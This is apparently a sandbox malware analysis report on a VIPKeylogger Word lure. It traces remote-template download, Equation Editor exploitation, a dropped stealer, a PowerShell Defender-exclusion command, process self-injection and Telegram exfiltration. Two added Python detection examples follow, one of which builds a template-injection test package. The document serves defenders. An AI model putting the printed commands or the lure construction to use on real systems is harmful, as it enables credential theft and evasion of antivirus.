Malware Analysis Report

2025-05-28 14:54

Sample ID 240821-hvdgfavfpf
Target qoute.docx.doc
SHA256 0716b488e853e64c11829ceadc87e805cd1513bcec26a8c261520a36aff87da2
Tags
vipkeylogger collection credential_access discovery execution keylogger spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0716b488e853e64c11829ceadc87e805cd1513bcec26a8c261520a36aff87da2

Threat Level: Known bad

The file qoute.docx.doc was found to be: Known bad.

Execution chain observed in behavioral1 (Windows 7, Office 2010): WINWORD.EXE opens the document, which fetches a second document (cached as ioqjWeKazzLuiTHfd[1].doc) from 154.216.18.222 over HTTP through an external OpenXML relationship. That document launches EQNEDT32.EXE (Equation Editor, started with -Embedding), which writes to and starts C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe. The dropped executable runs powershell.exe with Add-MpPreference -ExclusionPath to exclude itself from Microsoft Defender, then starts a second copy of itself and redirects that copy's thread (WriteProcessMemory followed by SetThreadContext on PID 2700), the usual self-injection pattern. The dropped executable reads Outlook profile keys and browser data, resolves the external IP address through checkip.dyndns.org and reallyfreegeoip.org, and connects to api.telegram.org:443, consistent with VIPKeylogger's Telegram exfiltration channel. In behavioral2 (Windows 10, Office 2016) the remote document was fetched from the same host but Equation Editor never launched, so the payload did not execute; the chain depends on EQNEDT32.EXE being present on the victim.

Malicious Activity Summary

vipkeylogger collection credential_access discovery execution keylogger spyware stealer

VIPKeylogger

Credentials from Password Stores: Credentials from Web Browsers

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Blocklisted process makes network request

Reads user/profile data of local email clients

Loads dropped DLL

Executes dropped EXE

Reads user/profile data of web browsers

Abuses OpenXML format to download file from external location

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Suspicious use of SetThreadContext

Drops file in System32 directory

Drops file in Windows directory

System Location Discovery: System Language Discovery

Browser Information Discovery

Enumerates physical storage devices

Office loads VBA resources, possible macro or embedded object present

Uses Volume Shadow Copy WMI provider

Suspicious behavior: AddClipboardFormatListener

outlook_office_path

outlook_win_path

Suspicious use of WriteProcessMemory

Launches Equation Editor

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Uses Task Scheduler COM API

Enumerates system info in registry

Checks processor information in registry

Uses Volume Shadow Copy service COM API

Suspicious use of SetWindowsHookEx

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-08-21 07:03

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-08-21 07:03

Reported

2024-08-21 07:05

Platform

win7-20240704-en

Max time kernel

119s

Max time network

122s

Command Line

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\qoute.docx"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Credentials from Password Stores: Credentials from Web Browsers

credential_access stealer

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Downloads MZ/PE file

Abuses OpenXML format to download file from external location

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Reads user/profile data of local email clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 3068 set thread context of 2700 N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\Debug\WIA\wiatrace.log C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe N/A

Office loads VBA resources, possible macro or embedded object present

Launches Equation Editor

exploit
Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeShutdownPrivilege N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of SetWindowsHookEx

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A
N/A N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2660 wrote to memory of 3068 N/A C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe (×4)
PID 2120 wrote to memory of 1476 N/A C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE C:\Windows\splwow64.exe (×4)
PID 3068 wrote to memory of 2908 N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (×4)
PID 3068 wrote to memory of 2700 N/A C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe (×9)

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-3294248377-1418901787-4083263181-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe N/A
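The "Abuses OpenXML format to download file from external location" signature above fires when a relationship inside the .docx package carries TargetMode="External", so Word fetches the target when the document opens. The report does not show which relationship type this sample uses; an attachedTemplate relationship in word/_rels/settings.xml.rels is the common vehicle for pulling a second-stage .doc like the cached ioqjWeKazzLuiTHfd[1].doc. The scanner below is an added example, not part of this report or of any sandbox vendor's tooling. It lists every external relationship in a package and builds a constructed minimal package (enough parts for the scanner, not a complete Word file) that attaches a remote template at a documentation address, not the sample's real host:

```python
import io
import zipfile
import xml.etree.ElementTree as ET

RELS_NS = "http://schemas.openxmlformats.org/package/2006/relationships"
OFFICE_REL = "http://schemas.openxmlformats.org/officeDocument/2006/relationships"
W_NS = "http://schemas.openxmlformats.org/wordprocessingml/2006/main"

# Relationship types Word resolves at open time; an External one of these is a
# download primitive. attachedTemplate is the usual template-injection vehicle.
HIGH_RISK = {"attachedTemplate", "oleObject", "frame", "subDocument"}


def scan_docx(data: bytes) -> list:
    """Return every relationship in the package whose TargetMode is External."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            if not name.endswith(".rels"):
                continue
            root = ET.fromstring(zf.read(name))
            for rel in root.iter(f"{{{RELS_NS}}}Relationship"):
                if rel.get("TargetMode", "Internal") != "External":
                    continue
                rtype = rel.get("Type", "").rsplit("/", 1)[-1]
                findings.append({
                    "part": name,
                    "id": rel.get("Id", ""),
                    "type": rtype,
                    "target": rel.get("Target", ""),
                    "severity": "high" if rtype in HIGH_RISK else "low",
                })
    return findings


def build_sample_docx(template_url=None) -> bytes:
    """Constructed minimal package for the demo: enough parts for the scanner,
    not a complete Word file. With template_url set, settings.xml attaches a
    remote template the way a template-injection lure does; None gives a clean
    package with only internal relationships."""
    def rel(rid, rtype, target, external=False):
        mode = ' TargetMode="External"' if external else ""
        return f'<Relationship Id="{rid}" Type="{OFFICE_REL}/{rtype}" Target="{target}"{mode}/>'

    pkg_rels = (f'<Relationships xmlns="{RELS_NS}">'
                + rel("rId1", "officeDocument", "word/document.xml") + "</Relationships>")
    doc_rels = (f'<Relationships xmlns="{RELS_NS}">'
                + rel("rId1", "settings", "settings.xml") + "</Relationships>")
    settings_rel, attach = "", ""
    if template_url is not None:
        settings_rel = rel("rId1", "attachedTemplate", template_url, external=True)
        attach = '<w:attachedTemplate r:id="rId1"/>'
    settings_rels = f'<Relationships xmlns="{RELS_NS}">' + settings_rel + "</Relationships>"
    settings_xml = (f'<w:settings xmlns:w="{W_NS}" xmlns:r="{OFFICE_REL}">'
                    + attach + "</w:settings>")

    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("_rels/.rels", pkg_rels)
        zf.writestr("word/document.xml", f'<w:document xmlns:w="{W_NS}"/>')
        zf.writestr("word/_rels/document.xml.rels", doc_rels)
        zf.writestr("word/settings.xml", settings_xml)
        zf.writestr("word/_rels/settings.xml.rels", settings_rels)
    return buf.getvalue()


if __name__ == "__main__":
    # Lure URL is constructed (documentation address), not the sample's real host.
    for f in scan_docx(build_sample_docx("http://198.51.100.7/lure.doc")):
        print(f"[{f['severity']}] {f['part']} {f['type']} -> {f['target']}")
```

Run it against a real sample by passing the file's bytes to scan_docx; a high-severity hit in word/_rels/settings.xml.rels is the template-injection case, while external hyperlinks and images are common in clean documents and are reported at low severity so they can be triaged rather than ignored.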

Processes

C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE

"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\qoute.docx"

C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe

"C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe"

C:\Windows\splwow64.exe

C:\Windows\splwow64.exe 12288

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe"

C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe

"C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe"

Network

Country Destination Domain Proto
US 154.216.18.222:80 154.216.18.222 tcp (×3)
US 8.8.8.8:53 checkip.dyndns.org udp
BR 132.226.247.73:80 checkip.dyndns.org tcp
US 8.8.8.8:53 reallyfreegeoip.org udp
US 104.21.67.152:443 reallyfreegeoip.org tcp
US 8.8.8.8:53 api.telegram.org udp
NL 149.154.167.220:443 api.telegram.org tcp
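The process list and the WriteProcessMemory / SetThreadContext signatures above give the whole kill chain in four relations: EQNEDT32.EXE creating a process, an Office host starting a binary out of AppData, powershell.exe adding a Defender exclusion, and a process setting the thread context of a second copy of itself. The triage routine below is an added example (not part of this report or of any sandbox product) that encodes those four rules and runs them over events constructed from the behavioral1 process list. PIDs 600 and 800 (explorer.exe and the DCOM svchost that starts Equation Editor) are assumed parents the report does not show; the remaining PIDs, images and command lines are as reported:

```python
import ntpath

# Parents that should never launch a binary out of a user-writable directory.
OFFICE_HOSTS = {"winword.exe", "excel.exe", "powerpnt.exe", "eqnedt32.exe"}


def _base(path: str) -> str:
    return ntpath.basename(path).lower()


def triage(events) -> list:
    """Run four rules over sandbox-style events (process_create and
    set_thread_context records) and return the findings they raise."""
    image = {}          # pid -> image path, learned from process_create events
    findings = []
    for ev in events:
        if ev["type"] == "process_create":
            image[ev["pid"]] = ev["image"]
            parent = _base(image.get(ev["ppid"], ""))
            child = ev["image"]
            cmd = ev.get("cmdline", "").lower()
            # 1. Equation Editor is an OLE server embedded in documents; it has
            #    no business creating processes at all.
            if parent == "eqnedt32.exe":
                findings.append({"rule": "eqnedt32_spawn", "pid": ev["pid"],
                                 "detail": f"EQNEDT32.EXE started {child}"})
            # 2. Office host launching a binary from AppData: dropper behaviour.
            if parent in OFFICE_HOSTS and "\\appdata\\" in child.lower():
                findings.append({"rule": "appdata_child", "pid": ev["pid"],
                                 "detail": f"{parent} started {child}"})
            # 3. Defender exclusion added from the command line.
            if "add-mppreference" in cmd and "-exclusionpath" in cmd:
                findings.append({"rule": "defender_exclusion", "pid": ev["pid"],
                                 "detail": ev["cmdline"]})
        elif ev["type"] == "set_thread_context":
            src, dst = image.get(ev["src_pid"]), image.get(ev["dst_pid"])
            # 4. A process redirecting a thread in a second copy of itself:
            #    the self-injection pattern seen on 3068 -> 2700.
            if src and dst and ev["src_pid"] != ev["dst_pid"] and src.lower() == dst.lower():
                findings.append({"rule": "self_injection", "pid": ev["dst_pid"],
                                 "detail": f"{ev['src_pid']} set thread context of "
                                           f"{ev['dst_pid']} ({_base(src)})"})
    return findings


def _pc(pid, ppid, image, cmdline):
    return {"type": "process_create", "pid": pid, "ppid": ppid,
            "image": image, "cmdline": cmdline}


EQNEDT = r"C:\Program Files (x86)\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE"
WINWORD = r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE"
DROPPED = r"C:\Users\Admin\AppData\Roaming\hgsnwealth82664.exe"
PWSH = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"

# Constructed from the behavioral1 process list and the WriteProcessMemory /
# SetThreadContext signatures. PIDs 600 and 800 are assumed parents.
SAMPLE_EVENTS = [
    _pc(800, 4, r"C:\Windows\System32\svchost.exe", "svchost.exe -k DcomLaunch"),
    _pc(600, 4, r"C:\Windows\explorer.exe", "explorer.exe"),
    _pc(2120, 600, WINWORD, f'"{WINWORD}" /n "C:\\Users\\Admin\\AppData\\Local\\Temp\\qoute.docx"'),
    _pc(1476, 2120, r"C:\Windows\splwow64.exe", r"C:\Windows\splwow64.exe 12288"),
    _pc(2660, 800, EQNEDT, f'"{EQNEDT}" -Embedding'),
    _pc(3068, 2660, DROPPED, f'"{DROPPED}"'),
    _pc(2908, 3068, PWSH, f'"{PWSH}" Add-MpPreference -ExclusionPath "{DROPPED}"'),
    _pc(2700, 3068, DROPPED, f'"{DROPPED}"'),
    {"type": "set_thread_context", "src_pid": 3068, "dst_pid": 2700},
]

BENIGN_EVENTS = SAMPLE_EVENTS[:4]   # explorer -> WINWORD -> splwow64 only


if __name__ == "__main__":
    for hit in triage(SAMPLE_EVENTS):
        print(f"{hit['rule']:<20} pid={hit['pid']} {hit['detail']}")
```

Rules 1 and 2 fire on the same event (PID 3068), which is the right outcome: either alone is enough to page on, and WINWORD spawning splwow64.exe (the 32-bit print spooler helper) stays silent because it lives under C:\Windows. On a real host the same four rules map onto Sysmon process-creation events with the parent image field, except rule 4, which needs an EDR or sandbox that records SetThreadContext.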

Files

memory/2120-0-0x000000002F711000-0x000000002F712000-memory.dmp

memory/2120-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2120-2-0x00000000710FD000-0x0000000071108000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\{505CDEC2-D201-4044-AA09-01EAA32752C9}

MD5 6817c35597ce7e0fe21e063774007d46
SHA1 06943e4b806c415323d88f05cbaf4118a75d130d
SHA256 1ae0dea82c5bf51251226b81c300c4b5513e9da185799a30aff0c0fa156149e0
SHA512 8d66c0b46bd5e012d891fd381e549f4a9b3b837adc305f392669aa18aae5e5e107af03acddbc649eb70aeabbb5d2f071726351f17f774fc5bbec121f0b049d6b

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\FSD-{31AA283F-DCA1-4D57-B1E1-8405167C2D04}.FSD

MD5 8de897090a012ddd58bbf68f3c53ca43
SHA1 2450cd9edc40d73502dc87d34691958b9adf798e
SHA256 9ef45dc7cbbff1cc7e6ead6653dcc3729759ab85752155bbfd06e3fc98a8f531
SHA512 d925803c135efeb2980f189ce7d33607445033e47224db74d32a50749697eb7463113cee810e9c835e9eca70a7720f99272f0dea38c387a5482e509358573530

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-CNRY.FSD

MD5 ff337769a46bef53eaac5c229102ba78
SHA1 f4a21ef21e2e913947523977f34f442e6d3af7dc
SHA256 b6a32b4f3fcfae403568532326f6a5d810139b1e4e36af290ec888fd03be9926
SHA512 bf8cce105dfa6c0ceb36e058ff3e3c35555bf04217260b8d2b22fde0e5d005e7da2468e753b87a6e9efdc1c3e215d26747f4138224314b873a7d1017338c93d7

C:\Users\Admin\AppData\Local\Microsoft\Office\14.0\OfficeFileCache\LocalCacheFileEditManager\FSD-{7D31351A-06EB-469C-A1FC-ACE4C8DE71D7}.FSD

MD5 ef96eb74f78fe0c5e90d2ddcdedd63d9
SHA1 7b4c44efba70d581b7e6eb771fa171de8ffed5d4
SHA256 bf5de6f9f3455fadb7b327a7646ebc1105e2e582e020feb5d0cdf06ed7a77022
SHA512 624a534ee67e73f221de406f26508ca00c95c3150279c2c6ca43e3668bef713b198f2f496a2de2078b783bfe579191f80da87ea1ddc635183a7b3033884c14f8

C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\WNZH54VQ\ioqjWeKazzLuiTHfd[1].doc

MD5 16ddde7b45c040f9fb63e73863134f5c
SHA1 ca18b30011b59e341eae8006d05d543e7314ce0c
SHA256 05ad66d563f492c9b527602ff6c7bd9b8fa0ed8f288d0481f51ebe6b71b05242
SHA512 4b6dd4b9fc79ed9639f95eeff4756e3915591fca8265c70c361709f0aa46aec542143d1966cbf746bfc4eb8efd09ccebab9ff5290719025ade090fb8b8fd2c3b

\Users\Admin\AppData\Roaming\hgsnwealth82664.exe

MD5 06ef63fcb30cb75b38e13a0a12764097
SHA1 fbf8ee77153177587ef1e81e36cb4adad054d208
SHA256 23b9b4a46c15c5fa3b7445e8041852f3dc831547903250209ca738b1a17fb7c2
SHA512 833722edea13277437343fd24cdfdd2b99a5c8d909a68421ee65bb0e0bbefa41aef183340cce4991d55c21d505e6bfc7e6bb429ccbb10bcdf619669e800b42d2

memory/3068-94-0x0000000000A50000-0x0000000000B06000-memory.dmp

memory/3068-96-0x0000000000520000-0x0000000000532000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\UProof\ExcludeDictionaryEN0409.lex

MD5 f3b25701fe362ec84616a93a45ce9998
SHA1 d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256 b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA512 98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

memory/2120-103-0x00000000710FD000-0x0000000071108000-memory.dmp

memory/3068-104-0x0000000000530000-0x0000000000540000-memory.dmp

memory/3068-105-0x0000000004BD0000-0x0000000004C5A000-memory.dmp

memory/2700-118-0x0000000000400000-0x0000000000448000-memory.dmp

memory/2700-117-0x0000000000400000-0x0000000000448000-memory.dmp

memory/2700-115-0x0000000000400000-0x0000000000448000-memory.dmp

memory/2700-114-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

memory/2700-112-0x0000000000400000-0x0000000000448000-memory.dmp

memory/2700-110-0x0000000000400000-0x0000000000448000-memory.dmp

memory/2700-108-0x0000000000400000-0x0000000000448000-memory.dmp

memory/2700-107-0x0000000000400000-0x0000000000448000-memory.dmp

C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

MD5 e78e5f1a5efafcec6e2cdfa6e0ac32a4
SHA1 e2b0d742dbe54699055b4a5265f34b92a8c685bd
SHA256 4114ba504ef39436f9a1ed81b757911ee206b0bba1f1fb7f40b928120d9d7ec5
SHA512 e39eed4d217e917def475edf063153a7d7f47a76e16bdb20fb7a470369e0d78161914cdbb5f19ae9b05e317740e4b4fc0620ebb4cf75ea21ecfe6329c353ec7c

memory/2120-143-0x000000005FFF0000-0x0000000060000000-memory.dmp

memory/2120-144-0x00000000710FD000-0x0000000071108000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-08-21 07:03

Reported

2024-08-21 07:05

Platform

win10v2004-20240802-en

Max time kernel

101s

Max time network

125s

Command Line

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\qoute.docx" /o ""

Signatures

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A
N/A N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeAuditPrivilege N/A C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE N/A

Uses Task Scheduler COM API

persistence

Uses Volume Shadow Copy WMI provider

ransomware

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE

"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\qoute.docx" /o ""

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp
US 8.8.8.8:53 133.211.185.52.in-addr.arpa udp
US 8.8.8.8:53 97.32.109.52.in-addr.arpa udp
US 8.8.8.8:53 240.143.123.92.in-addr.arpa udp
US 8.8.8.8:53 roaming.officeapps.live.com udp
IE 52.109.76.243:443 roaming.officeapps.live.com tcp
US 154.216.18.222:80 154.216.18.222 tcp
US 154.216.18.222:80 154.216.18.222 tcp
US 8.8.8.8:53 g.bing.com udp
US 204.79.197.237:443 g.bing.com tcp
US 8.8.8.8:53 243.76.109.52.in-addr.arpa udp
US 8.8.8.8:53 222.18.216.154.in-addr.arpa udp
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 237.197.79.204.in-addr.arpa udp
US 8.8.8.8:53 149.220.183.52.in-addr.arpa udp
US 8.8.8.8:53 26.35.223.20.in-addr.arpa udp
US 8.8.8.8:53 168.117.168.52.in-addr.arpa udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 metadata.templates.cdn.office.net udp
GB 23.40.43.41:443 metadata.templates.cdn.office.net tcp
US 8.8.8.8:53 binaries.templates.cdn.office.net udp
GB 173.222.211.57:443 binaries.templates.cdn.office.net tcp (×45)
US 8.8.8.8:53 41.43.40.23.in-addr.arpa udp
US 8.8.8.8:53 192.142.123.92.in-addr.arpa udp
US 8.8.8.8:53 57.211.222.173.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp (×5)
US 8.8.8.8:53 88.156.103.20.in-addr.arpa udp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp
US 8.8.8.8:53 13.227.111.52.in-addr.arpa udp

Files

memory/2640-1-0x00007FFD9C44D000-0x00007FFD9C44E000-memory.dmp

memory/2640-0-0x00007FFD5C430000-0x00007FFD5C440000-memory.dmp

memory/2640-3-0x00007FFD5C430000-0x00007FFD5C440000-memory.dmp

memory/2640-2-0x00007FFD5C430000-0x00007FFD5C440000-memory.dmp

memory/2640-4-0x00007FFD5C430000-0x00007FFD5C440000-memory.dmp

memory/2640-5-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-9-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-8-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-7-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-10-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-11-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-12-0x00007FFD59E10000-0x00007FFD59E20000-memory.dmp

memory/2640-6-0x00007FFD5C430000-0x00007FFD5C440000-memory.dmp

memory/2640-13-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-15-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-18-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-19-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-23-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-22-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-21-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-20-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-17-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-16-0x00007FFD9C3B0000-0x00007FFD9C5A5000-memory.dmp

memory/2640-14-0x00007FFD59E10000-0x00007FFD59E20000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\INetCache\IE\JACP9GNT\ioqjWeKazzLuiTHfd[1].doc

MD5 16ddde7b45c040f9fb63e73863134f5c
SHA1 ca18b30011b59e341eae8006d05d543e7314ce0c
SHA256 05ad66d563f492c9b527602ff6c7bd9b8fa0ed8f288d0481f51ebe6b71b05242
SHA512 4b6dd4b9fc79ed9639f95eeff4756e3915591fca8265c70c361709f0aa46aec542143d1966cbf746bfc4eb8efd09ccebab9ff5290719025ade090fb8b8fd2c3b

C:\Users\Admin\AppData\Roaming\Microsoft\Office\Recent\index.dat

